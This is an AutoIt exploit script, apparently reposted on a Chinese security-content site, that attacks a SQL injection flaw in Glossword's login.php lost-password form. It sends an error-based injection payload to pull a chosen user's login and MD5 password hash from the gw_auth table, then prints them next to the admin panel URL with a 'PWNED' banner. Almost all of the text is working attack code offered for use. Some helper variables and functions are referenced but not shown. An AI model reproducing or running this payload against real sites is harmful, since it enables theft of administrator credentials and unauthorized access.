Glossword 'login.php' SQL 注入漏洞(2)

if $CmdLine[0]=3 Then
 $targetsite=$CmdLine[1];
 $installdir=$CmdLine[2];
 $uidtoattack=Number(StringMid($CmdLine[3],1,255));
 EndIf
 
if not StringIsDigit($uidtoattack) Then
  ConsoleWrite(' UID is wrong! Exit' );
  Exit;
  EndIf
 


if StringStripWS($targetsite,8)='' OR StringStripWS($installdir,8)='' Then
  ConsoleWrite('Are you kidding meeeeen?');
  Exit;
 EndIf
 

HttpSetUserAgent($useragent)
 $doublecheck=InetGet($targetsite,'',1);
 if @error Then
  ConsoleWrite('[*] Incorrect Domain Name/Or you are Offline! [*]' & @CRLF)
  Exit;
 EndIf
 


sleep(Random(1200,2500,1));
 
sendfakeretrivevalidsess($targetsite,$installdir)
 
HttpSetUserAgent($useragent);
 $sidentify=_INetGetSource($targetsite & $adminpanel,True);
 
Func exploit($targetsite,$installdir,$sessid)
 Global $sAddress = $targetsite
 Global $PAYLOADTOSEND ="arPost[user_name]=') AND (select floor(rand(0)*2) from(select count(*)," & _
 "concat((select concat(0x3C73696B6469723E,login,0x7c,password,0x3C2F73696B6469723E,0x7c) from " & _
 "gw_auth where id_auth=" & $uidtoattack & "),floor(rand(0)*2))x from information_schema.tables group by x)a)-- " & _
 " AND 1=('1&arPost[user_email]=trueownage&a=lostpass&sid=" & $sessid & "&post=Send password";
 Global $sDomain = $targetsite
 Global $sPage = $installdir & $vulnurl
 Global $sAdditionalData = $PAYLOADTOSEND
 Global $hOpen = _WinHttpOpen($useragent)
 Global $hConnect = _WinHttpConnect($hOpen, $sDomain)
 Global $hRequest = _WinHttpOpenRequest($hConnect, "POST", $sPage, -1, -1, -1, '')
 _WinHttpSendRequest($hRequest, "Content-Type: application/x-www-form-urlencoded", $sAdditionalData)
 _WinHttpReceiveResponse($hRequest)
 Global $sReturned
 If _WinHttpQueryDataAvailable($hRequest) Then
    Do
        $sReturned &= _WinHttpReadData($hRequest)
    Until @error
 
  if StringInStr($sReturned,'<sikdir>') and StringInStr($sReturned,'</sikdir>') Then
 
$zsuxxv = StringRegExp($sReturned, '<(?i)sikdir>(.*?)</(?i)sikdir>', 1)
 For $x = 0 To UBound($zsuxxv) - 1
  Beep(100,1000);
    ConsoleWrite($triptrop & '[*]                  !~ P*W*N*E*D ~!                      [*] ' & _
  StringReplace($triptrop,'#','-') & '[*] Login: ' & StringMid($zsuxxv[$x],1,StringInStr($zsuxxv[$x],'|')-1) & _
  _StringRepeat(' ',StringLen($triptrop)-18-StringLen(StringMid($zsuxxv[$x],1,StringInStr($zsuxxv[$x],'|')-1))) & '[*]' & _
  StringReplace($triptrop,'#','-') & '[*] Password: (MD5) ' & StringReplace($zsuxxv[$x],StringMid($zsuxxv[$x],1,StringInStr($zsuxxv[$x],'|')),'') & _
  '      [*] ' & _
  StringReplace($triptrop,'#','-') & _
  'Admin Panel: ' & $targetsite & $installdir &$adminpanel & ' ' & StringReplace($triptrop,'#','-') & _
  '[*]                    Good Luck;)                        [*]' & _
  $triptrop & '[*]                    DONE                              [*]' & _
  $triptrop);
 Next
 
Else
 
  ConsoleWrite($triptrop & '[*] ' & _StringRepeat(' ',18) & '  NO SUCH UID!  ' &  _StringRepeat(' ',18) & _
  ' [*]' & $triptrop);
  Beep(1500,1000);
  Exit
 

EndIf
 EndIf
 _WinHttpCloseHandle($hRequest)
 _WinHttpCloseHandle($hConnect)
 _WinHttpCloseHandle($hOpen)
 EndFunc;=> exploit();
 

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wywfwd.html